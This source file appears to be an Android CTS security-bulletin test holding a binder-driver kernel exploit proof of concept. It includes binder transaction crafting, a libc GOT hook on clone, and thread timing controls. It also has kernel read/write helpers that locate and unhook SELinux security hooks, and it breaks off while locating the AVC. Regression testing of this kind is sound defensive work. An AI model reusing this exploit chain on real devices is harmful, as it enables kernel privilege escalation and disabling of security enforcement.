1 /*
2 * Copyright (C) 2019 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16
17 #define _GNU_SOURCE
18 #include <sys/mman.h>
19 #include <sys/types.h>
20 #include <sys/stat.h>
21 #include <sys/socket.h>
22 #include <sys/sysinfo.h>
23 #include <sys/un.h>
24 #include <sys/prctl.h>
25
26 #include <stdio.h>
27 #include <stdlib.h>
28 #include <string.h>
29 #include <syscall.h>
30 #include <pthread.h>
31 #include <dirent.h>
32 #include <unistd.h>
33 #include <fcntl.h>
34 #include <errno.h>
35 #include <sched.h>
36 #include <poll.h>
37 #include <elf.h>
38
39 #include <cutils/log.h>
40 #include <cutils/properties.h>
41 #include <jni.h>
42 #include <linux/android/binder.h>
43
44 #include "../../../../hostsidetests/securitybulletin/securityPatch/includes/common.h"
45
46 typedef uint8_t u8;
47 typedef uint16_t u16;
48 typedef uint32_t u32;
49 typedef uint64_t u64;
50 typedef int64_t s64;
51
52 jobject this;
53 jmethodID add_log;
54 JavaVM *jvm;
55
56 #define MAX_THREADS 10
57
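// Map each attached thread's tid to its JNIEnv so dbg() can call back into Java
// from whichever native thread happens to be logging.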
58 struct tid_jenv {
59 int tid;
60 JNIEnv *env;
61 };
62 struct tid_jenv tid_jenvs[MAX_THREADS];
63 int num_threads;
64
int gettid() {
66 return (int)syscall(SYS_gettid);
67 }
68
69 void fail(char *msg, ...);
70
void add_jenv(JNIEnv *e) {
72 if (num_threads >= MAX_THREADS) {
73 fail("too many threads");
74 return;
75 }
76 struct tid_jenv *te = &tid_jenvs[num_threads++];
77 te->tid = gettid();
78 te->env = e;
79 }
80
JNIEnv *get_jenv() {
82 int tid = gettid();
83 for (int i = 0; i < num_threads; i++) {
84 struct tid_jenv *te = &tid_jenvs[i];
85 if (te->tid == tid)
86 return te->env;
87 }
88 return NULL;
89 }
90
void jni_attach_thread() {
92 JNIEnv *env;
93 (*jvm)->AttachCurrentThread(jvm, &env, NULL);
94 add_jenv(env);
95 }
96
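// Threads that never attach to the JVM hand their log lines to log_thread()
// through this single-slot mailbox (log_line) guarded by log_mut.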
97 pthread_mutex_t log_mut = PTHREAD_MUTEX_INITIALIZER;
98 pthread_cond_t log_pending = PTHREAD_COND_INITIALIZER;
99 pthread_cond_t log_done = PTHREAD_COND_INITIALIZER;
100 volatile char *log_line;
101
void send_log_thread(char *msg) {
103 pthread_mutex_lock(&log_mut);
104 while (log_line)
105 pthread_cond_wait(&log_done, &log_mut);
106 log_line = msg;
107 pthread_cond_signal(&log_pending);
108 pthread_mutex_unlock(&log_mut);
109 }
110
111 void dbg(char *msg, ...);
112
void log_thread(u64 arg) {
114 while (1) {
115 pthread_mutex_lock(&log_mut);
116 while (!log_line)
117 pthread_cond_wait(&log_pending, &log_mut);
118 dbg("%s", log_line);
119 free((void*)log_line);
120 log_line = NULL;
121 pthread_cond_signal(&log_done);
122 pthread_mutex_unlock(&log_mut);
123 }
124 }
125
void dbg(char *msg, ...) {
127 char *line;
128 va_list va;
129 JNIEnv *env = get_jenv();
130 va_start(va, msg);
131 if (vasprintf(&line, msg, va) >= 0) {
132 if (env) {
133 jstring jline = (*env)->NewStringUTF(env, line);
134 (*env)->CallVoidMethod(env, this, add_log, jline);
135 free(line);
136 } else {
137 send_log_thread(line);
138 }
139 }
140 va_end(va);
141 }
142
void fail(char *msg, ...) {
144 char *line;
145 va_list va;
146 va_start(va, msg);
147 if (vasprintf(&line, msg, va) >= 0)
148 dbg("FAIL: %s (errno=%d)", line, errno);
149 va_end(va);
150 }
151
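// buf_t is a simple append-only buffer used to compose binder write commands;
// parser_t walks the read buffer returned by BINDER_WRITE_READ.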
152 struct buffer {
153 char *p;
154 u32 size;
155 u32 off;
156 };
157
158 typedef struct buffer buf_t;
159
160 struct parser {
161 u8 *buf;
162 u8 *p;
163 u32 size;
164 };
165
166 typedef struct parser parser_t;
167
parser_t *new_parser() {
169 parser_t *ret = malloc(sizeof(parser_t));
170 ret->size = 0x400;
171 ret->buf = ret->p = malloc(ret->size);
172 return ret;
173 }
174
void free_parser(parser_t *parser) {
176 free(parser->buf);
177 free(parser);
178 }
179
int parser_end(parser_t *p) {
181 return !p->size;
182 }
183
void *parser_get(parser_t *p, u32 sz) {
185 if (sz > p->size) {
186 fail("parser size exceeded");
187 return NULL;
188 }
189 p->size -= sz;
190 u8 *ret = p->p;
191 p->p += sz;
192 return ret;
193 }
194
u32 parse_u32(parser_t *p) {
196 u32 *pu32 = parser_get(p, sizeof(u32));
197 return (pu32 == NULL) ? (u32)-1 : *pu32;
198 }
199
buf_t *new_buf_sz(u32 sz) {
201 buf_t *b = malloc(sizeof(buf_t));
202 b->size = sz;
203 b->off = 0;
204 b->p = malloc(sz);
205 return b;
206 }
207
buf_t *new_buf() {
209 return new_buf_sz(0x200);
210 }
211
void free_buf(buf_t *buf) {
213 free(buf->p);
214 free(buf);
215 }
216
void *buf_alloc(buf_t *b, u32 s) {
218 s = (s + 3) & ~3;
219 if (b->size - b->off < s)
220 fail("out of buf space");
221 char *ret = b->p + b->off;
222 b->off += s;
223 memset(ret, 0x00, s);
224 return ret;
225 }
226
void buf_u32(buf_t *b, u32 v) {
228 char *p = buf_alloc(b, sizeof(u32));
229 *(u32*)p = v;
230 }
231
void buf_u64(buf_t *b, u64 v) {
233 char *p = buf_alloc(b, sizeof(u64));
234 *(u64*)p = v;
235 }
236
void buf_uintptr(buf_t *b, u64 v) {
238 char *p = buf_alloc(b, sizeof(u64));
239 *(u64*)p = v;
240 }
241
void buf_str16(buf_t *b, const char *s) {
243 if (!s) {
244 buf_u32(b, 0xffffffff);
245 return;
246 }
247 u32 len = strlen(s);
248 buf_u32(b, len);
249 u16 *dst = (u16*)buf_alloc(b, (len + 1) * 2);
250 for (u32 i = 0; i < len; i++)
251 dst[i] = s[i];
252 dst[len] = 0;
253 }
254
void buf_binder(buf_t *b, buf_t *off, void *ptr) {
256 buf_u64(off, b->off);
257 struct flat_binder_object *fp = buf_alloc(b, sizeof(*fp));
258 fp->hdr.type = BINDER_TYPE_BINDER;
259 fp->flags = FLAT_BINDER_FLAG_ACCEPTS_FDS;
260 fp->binder = (u64)ptr;
261 fp->cookie = 0;
262 }
263
264 static inline void binder_write(int fd, buf_t *buf);
265
void enter_looper(int fd) {
267 buf_t *buf = new_buf();
268 buf_u32(buf, BC_ENTER_LOOPER);
269 binder_write(fd, buf);
270 }
271
void init_binder(int fd) {
273 void *map_ret = mmap(NULL, 0x200000, PROT_READ, MAP_PRIVATE, fd, 0);
274 if (map_ret == MAP_FAILED)
275 fail("map fail");
276 enter_looper(fd);
277 }
278
int open_binder() {
280 int fd = open("/dev/binder", O_RDONLY);
281 if (fd < 0)
282 fail("open binder fail");
283 init_binder(fd);
284 return fd;
285 }
286
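// Thin wrapper around the BINDER_WRITE_READ ioctl; either size may be zero for a
// pure read or pure write.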
static inline void binder_rw(int fd, void *rbuf, u32 rsize,
288 void *wbuf, u32 wsize, u32 *read_consumed, u32 *write_consumed) {
289 struct binder_write_read bwr;
290 memset(&bwr, 0x00, sizeof(bwr));
291 bwr.read_buffer = (u64)rbuf;
292 bwr.read_size = rsize;
293 bwr.write_buffer = (u64)wbuf;
294 bwr.write_size = wsize;
295 if (ioctl(fd, BINDER_WRITE_READ, &bwr) < 0)
296 fail("binder ioctl fail");
297 if (read_consumed)
298 *read_consumed = bwr.read_consumed;
299 if (write_consumed)
300 *write_consumed = bwr.write_consumed;
301 }
302
void binder_read(int fd, void *rbuf, u32 rsize, u32 *read_consumed) {
304 binder_rw(fd, rbuf, rsize, 0, 0, read_consumed, NULL);
305 }
306
static inline void binder_write(int fd, buf_t *buf) {
308 u32 write_consumed;
309 binder_rw(fd, 0, 0, buf->p, buf->off, NULL, &write_consumed);
310 if (write_consumed != buf->off)
311 fail("binder write fail");
312 free_buf(buf);
313 }
314
void do_send_txn(int fd, u32 to, u32 code, buf_t *trdat, buf_t *troff, int oneway, int is_reply, binder_size_t extra_sz) {
316 buf_t *buf = new_buf();
317 buf_u32(buf, is_reply ? BC_REPLY_SG : BC_TRANSACTION_SG);
318 struct binder_transaction_data_sg *tr;
319 tr = buf_alloc(buf, sizeof(*tr));
320 struct binder_transaction_data *trd = &tr->transaction_data;
321 trd->target.handle = to;
322 trd->code = code;
323 if (oneway)
324 trd->flags |= TF_ONE_WAY;
325 trd->data.ptr.buffer = trdat ? (u64)trdat->p : 0;
326 trd->data.ptr.offsets = troff ? (u64)troff->p : 0;
327 trd->data_size = trdat ? trdat->off : 0;
328 trd->offsets_size = troff ? troff->off : 0;
329 tr->buffers_size = extra_sz;
330 binder_write(fd, buf);
331 if (trdat)
332 free_buf(trdat);
333 if (troff)
334 free_buf(troff);
335 }
336
void send_txn(int fd, u32 to, u32 code, buf_t *trdat, buf_t *troff) {
338 do_send_txn(fd, to, code, trdat, troff, 0, 0, 0);
339 }
340
void send_reply(int fd) {
342 do_send_txn(fd, 0, 0, NULL, NULL, 0, 1, 0);
343 }
344
static inline void chg_ref(int fd, unsigned desc, u32 cmd) {
346 buf_t *buf = new_buf();
347 buf_u32(buf, cmd);
348 buf_u32(buf, desc);
349 binder_write(fd, buf);
350 }
351
void inc_ref(int fd, unsigned desc) {
353 chg_ref(fd, desc, BC_ACQUIRE);
354 }
355
void dec_ref(int fd, unsigned desc) {
357 chg_ref(fd, desc, BC_RELEASE);
358 }
359
static inline void free_buffer(int fd, u64 ptr) {
361 buf_t *buf = new_buf();
362 buf_u32(buf, BC_FREE_BUFFER);
363 buf_uintptr(buf, ptr);
364 binder_write(fd, buf);
365 }
366
367 typedef struct {
368 int fd;
369 char *buf;
370 binder_size_t size;
371 binder_size_t parsed;
372 binder_size_t *offsets;
373 binder_size_t num_offsets;
374 u32 code;
375 u64 ptr;
376 } txn_t;
377
void *txn_get(txn_t *t, u32 sz) {
379 sz = (sz + 3) & ~3u;
380 if (sz > t->size - t->parsed)
381 fail("txn get not enough data");
382 char *ret = t->buf + t->parsed;
383 t->parsed += sz;
384 return ret;
385 }
386
binder_size_t txn_offset(txn_t *t) {
388 return t->parsed;
389 }
390
void txn_set_offset(txn_t *t, binder_size_t off) {
392 t->parsed = off;
393 }
394
u32 txn_u32(txn_t *t) {
396 return *(u32*)txn_get(t, sizeof(u32));
397 }
398
int txn_int(txn_t *t) {
400 return *(int*)txn_get(t, sizeof(int));
401 }
402
u32 txn_handle(txn_t *t) {
404 struct flat_binder_object *fp;
405 fp = txn_get(t, sizeof(*fp));
406 if (fp->hdr.type != BINDER_TYPE_HANDLE)
407 fail("expected binder");
408 return fp->handle;
409 }
410
u16 *txn_str(txn_t *t) {
412 int len = txn_int(t);
413 if (len == -1)
414 return NULL;
415 if (len > 0x7fffffff / 2 - 1)
416 fail("bad txn str len");
417 return txn_get(t, (len + 1) * 2);
418 }
419
static inline u64 txn_buf(txn_t *t) {
421 return (u64)t->buf;
422 }
423
void free_txn(txn_t *txn) {
425 free_buffer(txn->fd, txn_buf(txn));
426 }
427
428
void handle_cmd(int fd, u32 cmd, void *dat) {
430 if (cmd == BR_ACQUIRE || cmd == BR_INCREFS) {
431 struct binder_ptr_cookie *pc = dat;
432 buf_t *buf = new_buf();
433 u32 reply = cmd == BR_ACQUIRE ? BC_ACQUIRE_DONE : BC_INCREFS_DONE;
434 buf_u32(buf, reply);
435 buf_uintptr(buf, pc->ptr);
436 buf_uintptr(buf, pc->cookie);
437 binder_write(fd, buf);
438 }
439 }
440
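// Read from binder until a BR_TRANSACTION/BR_REPLY arrives, acknowledging any
// reference-count commands seen on the way, and capture the transaction data in t.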
void recv_txn(int fd, txn_t *t) {
442 u32 found = 0;
443 while (!found) {
444 parser_t *p = new_parser();
445 binder_read(fd, p->p, p->size, &p->size);
446 while (!parser_end(p)) {
447 u32 cmd = parse_u32(p);
448 void *dat = (void *)parser_get(p, _IOC_SIZE(cmd));
449 if (dat == NULL) {
450 free_parser(p);
451 return;
452 }
453 handle_cmd(fd, cmd, dat);
454 if (cmd == BR_TRANSACTION || cmd == BR_REPLY) {
455 struct binder_transaction_data *tr = dat;
456 if (!parser_end(p))
457 fail("expected parser end");
458 t->fd = fd;
459 t->buf = (char*)tr->data.ptr.buffer;
460 t->parsed = 0;
461 t->size = tr->data_size;
462 t->offsets = (binder_size_t*)tr->data.ptr.offsets;
463 t->num_offsets = tr->offsets_size / sizeof(binder_size_t);
464 t->code = tr->code;
465 t->ptr = tr->target.ptr;
466 found = 1;
467 }
468 }
469 free_parser(p);
470 }
471 }
472
u32 recv_handle(int fd) {
474 txn_t txn;
475 recv_txn(fd, &txn);
476 u32 hnd = txn_handle(&txn);
477 inc_ref(fd, hnd);
478 free_txn(&txn);
479 return hnd;
480 }
481
u32 get_activity_svc(int fd) {
483 buf_t *trdat = new_buf();
484 buf_u32(trdat, 0); // policy
485 buf_str16(trdat, "android.os.IServiceManager");
486 buf_str16(trdat, "activity");
487 int SVC_MGR_GET_SERVICE = 1;
488 send_txn(fd, 0, SVC_MGR_GET_SERVICE, trdat, NULL);
489 return recv_handle(fd);
490 }
491
void txn_part(txn_t *t) {
493 int repr = txn_int(t);
494 if (repr == 0) {
495 txn_str(t);
496 txn_str(t);
497 } else if (repr == 1 || repr == 2) {
498 txn_str(t);
499 } else {
500 fail("txn part bad repr");
501 }
502 }
503
void txn_uri(txn_t *t) {
505 int type = txn_int(t);
506 if (type == 0) // NULL_TYPE_ID
507 return;
508 if (type == 1) { // StringUri.TYPE_ID
509 txn_str(t);
510 } else if (type == 2) {
511 txn_str(t);
512 txn_part(t);
513 txn_part(t);
514 } else if (type == 3) {
515 txn_str(t);
516 txn_part(t);
517 txn_part(t);
518 txn_part(t);
519 txn_part(t);
520 } else {
521 fail("txn uri bad type");
522 }
523 }
524
void txn_component(txn_t *t) {
526 u16 *pkg = txn_str(t);
527 if (pkg)
528 txn_str(t); // class
529 }
530
void txn_rect(txn_t *t) {
532 txn_int(t);
533 txn_int(t);
534 txn_int(t);
535 txn_int(t);
536 }
537
int str16_eq(u16 *s16, char *s) {
539 while (*s) {
540 if (*s16++ != *s++)
541 return 0;
542 }
543 return !*s16;
544 }
545
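// Scan a parceled Bundle for a binder object stored under the key "bnd".
// The magic values appear to be the Bundle header ('BNDL'), and type 15 is
// assumed to be the parcel type code for an IBinder value.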
void txn_bundle(txn_t *t, u32 *hnd) {
547 int len = txn_int(t);
548 if (len < 0)
549 fail("bad bundle len");
550 if (len == 0)
551 return;
552 int magic = txn_int(t);
553 if (magic != 0x4c444e42 && magic != 0x4c444e44)
554 fail("bad bundle magic");
555 binder_size_t off = txn_offset(t);
556 int count = txn_int(t);
557 if (count == 1) {
558 u16 *key = txn_str(t);
559 int type = txn_int(t);
560 if (str16_eq(key, "bnd") && type == 15)
561 *hnd = txn_handle(t);
562 }
563 txn_set_offset(t, off);
564 txn_get(t, len);
565 }
566
void txn_intent(txn_t *t, u32 *hnd) {
568 txn_str(t); // action
569 txn_uri(t);
570 txn_str(t); // type
571 txn_int(t); // flags
572 txn_str(t); // package
573 txn_component(t);
574 if (txn_int(t)) // source bounds
575 txn_rect(t);
576 int n = txn_int(t);
577 if (n > 0) {
578 for (int i = 0; i < n; i++)
579 txn_str(t);
580 }
581 if (txn_int(t)) // selector
582 txn_intent(t, NULL);
583 if (txn_int(t))
584 fail("unexpected clip data");
585 txn_int(t); // content user hint
586 txn_bundle(t, hnd); // extras
587 }
588
void get_task_info(int fd, u32 app_task, u32 *hnd) {
590 buf_t *trdat = new_buf();
591 buf_u32(trdat, 0); // policy
592 buf_str16(trdat, "android.app.IAppTask");
593 send_txn(fd, app_task, 1 + 1, trdat, NULL);
594 txn_t txn;
595 recv_txn(fd, &txn);
596 if (txn_u32(&txn) != 0)
597 fail("getTaskInfo exception");
598 if (txn_int(&txn) == 0)
599 fail("getTaskInfo returned null");
600 txn_int(&txn); // id
601 txn_int(&txn); // persistent id
602 if (txn_int(&txn) > 0) // base intent
603 txn_intent(&txn, hnd);
604 if (*hnd != ~0u)
605 inc_ref(fd, *hnd);
606 free_txn(&txn);
607 }
608
u32 get_app_tasks(int fd, u32 actsvc) {
610 buf_t *trdat = new_buf();
611 buf_u32(trdat, 0); // policy
612 buf_str16(trdat, "android.app.IActivityManager");
613 buf_str16(trdat, "android.security.cts");
614 send_txn(fd, actsvc, 1 + 199, trdat, NULL);
615 txn_t txn;
616 recv_txn(fd, &txn);
617 if (txn_u32(&txn) != 0)
618 fail("getAppTasks exception");
619 int n = txn_int(&txn);
620 if (n < 0)
621 fail("getAppTasks n < 0");
622 u32 hnd = ~0u;
623 for (int i = 0; i < n; i++) {
624 u32 app_task = txn_handle(&txn);
625 get_task_info(fd, app_task, &hnd);
626 if (hnd != ~0u)
627 break;
628 }
629 if (hnd == ~0u)
630 fail("didn't find intent extras binder");
631 free_txn(&txn);
632 return hnd;
633 }
634
u32 get_exchg(int fd) {
636 u32 actsvc = get_activity_svc(fd);
637 u32 ret = get_app_tasks(fd, actsvc);
638 dec_ref(fd, actsvc);
639 return ret;
640 }
641
int get_binder(u32 *exchg) {
643 int fd = open_binder();
644 *exchg = get_exchg(fd);
645 return fd;
646 }
647
void exchg_put_binder(int fd, u32 exchg) {
649 buf_t *trdat = new_buf();
650 buf_t *troff = new_buf();
651 buf_u32(trdat, 0); // policy
652 buf_str16(trdat, "android.security.cts.IBinderExchange");
653 buf_binder(trdat, troff, (void*)1);
654 send_txn(fd, exchg, 1, trdat, troff);
655 txn_t txn;
656 recv_txn(fd, &txn);
657 free_txn(&txn);
658 }
659
u32 exchg_get_binder(int fd, u32 exchg) {
661 buf_t *trdat = new_buf();
662 buf_u32(trdat, 0); // policy
663 buf_str16(trdat, "android.security.cts.IBinderExchange");
664 send_txn(fd, exchg, 2, trdat, NULL);
665 txn_t txn;
666 recv_txn(fd, &txn);
667 if (txn_u32(&txn) != 0)
668 fail("getBinder exception");
669 u32 hnd = txn_handle(&txn);
670 inc_ref(fd, hnd);
671 free_txn(&txn);
672 return hnd;
673 }
674
void set_idle() {
    struct sched_param param = {
        .sched_priority = 0
    };
    if (sched_setscheduler(0, SCHED_IDLE, &param) < 0)
        fail("sched_setscheduler fail");
}
682
int do_set_cpu(int cpu) {
684 cpu_set_t set;
685 CPU_ZERO(&set);
686 CPU_SET(cpu, &set);
687 return sched_setaffinity(0, sizeof(set), &set);
688 }
689
void set_cpu(int cpu) {
691 if (do_set_cpu(cpu) < 0)
692 fail("sched_setaffinity fail");
693 }
694
695 struct sync {
696 pthread_cond_t cond;
697 pthread_mutex_t mutex;
698 volatile int triggered;
699 size_t num_waiters;
700 volatile size_t num_waited;
701 volatile size_t num_done;
702 };
703
704 typedef struct sync sync_t;
705
sync_t *alloc_sync() {
707 sync_t *ret = malloc(sizeof(sync_t));
708 if (pthread_mutex_init(&ret->mutex, NULL) ||
709 pthread_cond_init(&ret->cond, NULL))
710 fail("pthread init failed");
711 ret->triggered = 0;
712 ret->num_waiters = 1;
713 ret->num_waited = 0;
714 ret->num_done = 0;
715 return ret;
716 }
717
void sync_set_num_waiters(sync_t *sync, size_t num_waiters) {
719 sync->num_waiters = num_waiters;
720 }
721
void sync_pth_bc(sync_t *sync) {
723 if (pthread_cond_broadcast(&sync->cond) != 0)
724 fail("pthread_cond_broadcast failed");
725 }
726
void sync_pth_wait(sync_t *sync) {
728 pthread_cond_wait(&sync->cond, &sync->mutex);
729 }
730
void sync_wait(sync_t *sync) {
732 pthread_mutex_lock(&sync->mutex);
733 sync->num_waited++;
734 sync_pth_bc(sync);
735 while (!sync->triggered)
736 sync_pth_wait(sync);
737 pthread_mutex_unlock(&sync->mutex);
738 }
739
void sync_signal(sync_t *sync) {
741 pthread_mutex_lock(&sync->mutex);
742 while (sync->num_waited != sync->num_waiters)
743 sync_pth_wait(sync);
744 sync->triggered = 1;
745 sync_pth_bc(sync);
746 pthread_mutex_unlock(&sync->mutex);
747 }
748
void sync_done(sync_t *sync) {
750 pthread_mutex_lock(&sync->mutex);
751 sync->num_done++;
752 sync_pth_bc(sync);
753 while (sync->triggered)
754 sync_pth_wait(sync);
755 pthread_mutex_unlock(&sync->mutex);
756 }
757
void sync_wait_done(sync_t *sync) {
759 pthread_mutex_lock(&sync->mutex);
760 while (sync->num_done != sync->num_waiters)
761 sync_pth_wait(sync);
762 sync->triggered = 0;
763 sync->num_waited = 0;
764 sync->num_done = 0;
765 sync_pth_bc(sync);
766 pthread_mutex_unlock(&sync->mutex);
767 }
768
static inline void ns_to_timespec(u64 t, struct timespec *ts) {
770 const u64 k = 1000000000;
771 ts->tv_sec = t / k;
772 ts->tv_nsec = t % k;
773 }
774
static inline u64 timespec_to_ns(volatile struct timespec *t) {
776 return (u64)t->tv_sec * 1000000000 + t->tv_nsec;
777 }
778
static inline u64 time_now() {
780 struct timespec now;
781 if (clock_gettime(CLOCK_MONOTONIC, &now) < 0)
782 fail("clock_gettime failed");
783 return timespec_to_ns(&now);
784 }
785
static inline void sleep_until(u64 t) {
787 struct timespec wake;
788 ns_to_timespec(t, &wake);
789 int ret = clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME, &wake, NULL);
790 if (ret && ret != EINTR)
791 fail("clock_nanosleep failed");
792 }
793
void set_thread_name(const char *name) {
795 if (prctl(PR_SET_NAME, name) < 0)
796 fail("pr_set_name fail");
797 }
798
void set_timerslack() {
800 char path[64];
801 sprintf(path, "/proc/%d/timerslack_ns", gettid());
802 int fd = open(path, O_WRONLY);
803 if (fd < 0)
804 fail("open timerslack fail");
805 if (write(fd, "1\n", 2) != 2)
806 fail("write timeslack fail");
807 close(fd);
808 }
809
810 struct launch_dat {
811 u64 arg;
812 void (*func)(u64);
813 int attach_jni;
814 const char *name;
815 };
816
void *thread_start(void *vdat) {
818 struct launch_dat *dat = vdat;
819 if (dat->attach_jni)
820 jni_attach_thread();
821 set_thread_name(dat->name);
822 void (*func)(u64) = dat->func;
823 u64 arg = dat->arg;
824 free(dat);
825 (*func)(arg);
826 return NULL;
827 }
828
int launch_thread(const char *name, void (*func)(u64), sync_t **sync, u64 arg,
830 int attach_jni) {
831 if (sync)
832 *sync = alloc_sync();
833 struct launch_dat *dat = malloc(sizeof(*dat));
834 dat->func = func;
835 dat->arg = arg;
836 dat->attach_jni = attach_jni;
837 dat->name = name;
838 pthread_t th;
839 if (pthread_create(&th, NULL, thread_start, dat) != 0)
840 fail("pthread_create failed");
841 return pthread_gettid_np(th);
842 }
843
void *map_path(const char *path, u64 *size) {
845 int fd = open(path, O_RDONLY);
846 if (fd < 0)
847 fail("open libc fail");
848 struct stat st;
849 if (fstat(fd, &st) < 0)
850 fail("fstat fail");
851 void *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
852 if (map == MAP_FAILED)
853 fail("mmap libc fail");
854 *size = st.st_size;
855 close(fd);
856 return map;
857 }
858
859 typedef Elf64_Ehdr ehdr_t;
860 typedef Elf64_Shdr shdr_t;
861 typedef Elf64_Rela rela_t;
862 typedef Elf64_Sym sym_t;
863
shdr_t *find_rela_plt(void *elf) {
865 ehdr_t *ehdr = (ehdr_t *)elf;
866 shdr_t *shdr = ((shdr_t *)elf) + ehdr->e_shoff;
867 char *shstr = ((char *)elf) + shdr[ehdr->e_shstrndx].sh_offset;
868 for (u64 i = 0; i < ehdr->e_shnum; i++) {
869 char *name = shstr + shdr[i].sh_name;
870 if (strcmp(name, ".rela.plt") == 0)
871 return &shdr[i];
872 }
873 fail("didn't find .rela.plt");
874 return NULL;
875 }
876
u64 find_elf_clone_got(const char *path) {
878 u64 mapsz;
879 void *elf = map_path(path, &mapsz);
880 ehdr_t *ehdr = (ehdr_t *)elf;
881 shdr_t *shdr = ((shdr_t *)elf) + ehdr->e_shoff;
882 shdr_t *rphdr = find_rela_plt(elf);
883 if (rphdr == NULL) {
884 return (u64)0;
885 }
886 shdr_t *symhdr = &shdr[rphdr->sh_link];
887 shdr_t *strhdr = &shdr[symhdr->sh_link];
888 sym_t *sym = ((sym_t *)elf) + symhdr->sh_offset;
889 char *str = ((char *)elf) + strhdr->sh_offset;
890 rela_t *r = ((rela_t *)elf) + rphdr->sh_offset;
891 rela_t *end = r + rphdr->sh_size / sizeof(rela_t);
892 u64 ret = 0;
893 for (; r < end; r++) {
894 sym_t *s = &sym[ELF64_R_SYM(r->r_info)];
895 if (strcmp(str + s->st_name, "clone") == 0) {
896 ret = r->r_offset;
897 break;
898 }
899 }
900 if (!ret) {
901 fail("clone rela not found");
902 return (u64)0;
903 }
904 if (munmap(elf, mapsz) < 0) {
905 fail("munmap fail");
906 return (u64)0;
907 }
908 return ret;
909 }
910
911 int hook_tid;
912 int (*real_clone)(u64 a, u64 b, int flags, u64 c, u64 d, u64 e, u64 f);
913
int clone_unshare_files(u64 a, u64 b, int flags, u64 c, u64 d, u64 e, u64 f) {
915 if (gettid() == hook_tid)
916 flags &= ~CLONE_FILES;
917 return (*real_clone)(a, b, flags, c, d, e, f);
918 }
919
void unshare_following_clone_files() {
921 hook_tid = gettid();
922 }
923
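// Patch libc's GOT entry for clone() so that threads created after
// unshare_following_clone_files() is called drop CLONE_FILES and thus get their
// own file descriptor table.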
void hook_clone() {
925 void *p = (void*)((uintptr_t)clone & ~0xffful);
926 while (*(u32*)p != 0x464c457f)
927 p = (void *)(((u32 *)p) - 0x1000);
928 u64 *got = ((u64 *)p) + find_elf_clone_got("/system/lib64/libc.so");
929 if (*got != (u64)clone)
930 fail("bad got");
931 real_clone = (void*)clone;
932 void *page = (void*)((u64)got & ~0xffful);
933 if (mprotect(page, 0x1000, PROT_READ | PROT_WRITE) < 0) {
934 fail("got mprotect fail");
935 return;
936 }
937 *got = (u64)clone_unshare_files;
938 }
939
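// Forward declarations for the kernel read/write primitives built in stage2;
// scratch, rw_task, current and fdarr hold kernel addresses discovered later.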
940 u32 r32(u64 addr);
941 u64 r64(u64 addr);
942 void w64(u64 addr, u64 val);
943 void w128(u64 addr, u64 v1, u64 v2);
944 u64 scratch;
945 u64 rw_task;
946 u64 current;
947 u64 fdarr;
948
void hlist_del(u64 node) {
950 u64 next = r64(node);
951 u64 pprev = r64(node + 8);
952 if (r64(pprev) != node) {
953 fail("bad hlist");
954 return;
955 }
956 w64(pprev, next);
957 if (next)
958 w64(next + 8, pprev);
959 }
960
u64 get_file(int fd) {
962 return r64(fdarr + fd * 8);
963 }
964
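// Return the target of the first AArch64 BL instruction found within the first
// 30 instructions at func (read via the kernel read primitive).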
u64 first_bl(u64 func) {
966 for (int i = 0; i < 30; i++) {
967 u32 inst = r32(func + i * 4);
968 if ((inst >> 26) == 0x25) { // bl
969 s64 off = inst & ((1u << 26) - 1);
970 off <<= 64 - 26;
971 off >>= 64 - 26;
972 return func + i * 4 + off * 4;
973 }
974 }
975 fail("bl not found");
976 return (u64)-1;
977 }
978
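// Decode an adrp/add pair to recover the absolute address it materializes; used
// to locate global kernel objects from instruction sequences.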
int is_adrp(u32 inst) {
980 return ((inst >> 24) & 0x9f) == 0x90;
981 }
982
u64 parse_adrp(u64 p, u32 inst) {
984 s64 off = ((inst >> 5) & ((1u << 19) - 1)) << 2;
985 off |= (inst >> 29) & 3;
986 off <<= (64 - 21);
987 off >>= (64 - 21 - 12);
988 return (p & ~0xffful) + off;
989 }
990
u64 find_adrp_add(u64 addr) {
992 time_t test_started = start_timer();
993 while (timer_active(test_started)) {
994 u32 inst = r32(addr);
995 if (is_adrp(inst)) {
996 u64 ret = parse_adrp(addr, inst);
997 inst = r32(addr + 4);
998 if ((inst >> 22) != 0x244) {
999 fail("not add after adrp");
1000 return (u64)-1;
1001 }
1002 ret += (inst >> 10) & ((1u << 12) - 1);
1003 return ret;
1004 }
1005 addr += 4;
1006 }
1007 fail("adrp add not found");
1008 return (u64)-1;
1009 }
1010
u64 locate_hooks() {
1012 char path[256];
1013 DIR *d = opendir("/proc/self/map_files");
1014 char *p;
1015 while (1) {
1016 struct dirent *l = readdir(d);
1017 if (!l)
1018 fail("readdir fail");
1019 p = l->d_name;
1020 if (strcmp(p, ".") && strcmp(p, ".."))
1021 break;
1022 }
1023 sprintf(path, "/proc/self/map_files/%s", p);
1024 closedir(d);
1025 int fd = open(path, O_PATH | O_NOFOLLOW | O_RDONLY);
1026 if (fd < 0)
1027 fail("link open fail");
1028 struct stat st;
1029 if (fstat(fd, &st) < 0)
1030 fail("fstat fail");
1031 if (!S_ISLNK(st.st_mode))
1032 fail("link open fail");
1033 u64 file = get_file(fd);
1034 u64 inode = r64(file + 0x20);
1035 u64 iop = r64(inode + 0x20);
1036 u64 follow_link = r64(iop + 8);
1037 u64 cap = first_bl(follow_link);
1038 u64 scap = first_bl(cap);
1039 if (cap == (u64)-1 || scap == (u64)-1) {
1040 dbg("cap=%016zx", cap);
1041 dbg("scap=%016zx", scap);
1042 return (u64)-1;
1043 }
1044 u64 hooks = find_adrp_add(scap);
1045 close(fd);
1046 dbg("hooks=%016zx", hooks);
1047 return hooks;
1048 }
1049
void unhook(u64 hooks, int idx) {
1051 u64 hook = hooks + idx * 0x10;
1052 w128(hook, hook, hook);
1053 }
1054
u64 locate_avc(u64 hooks) {
1056 u64 se_file_open = r64(r64(hooks + 0x490) + 0x18);
1057 u64 seqno = first_bl(se_file_open);
1058 if (seqno == (u64)-1) {
1059 dbg("seqno=%016zx", seqno);
1060 return (u64)-1;
1061 }
1062 u64 avc = find_adrp_add(seqno);
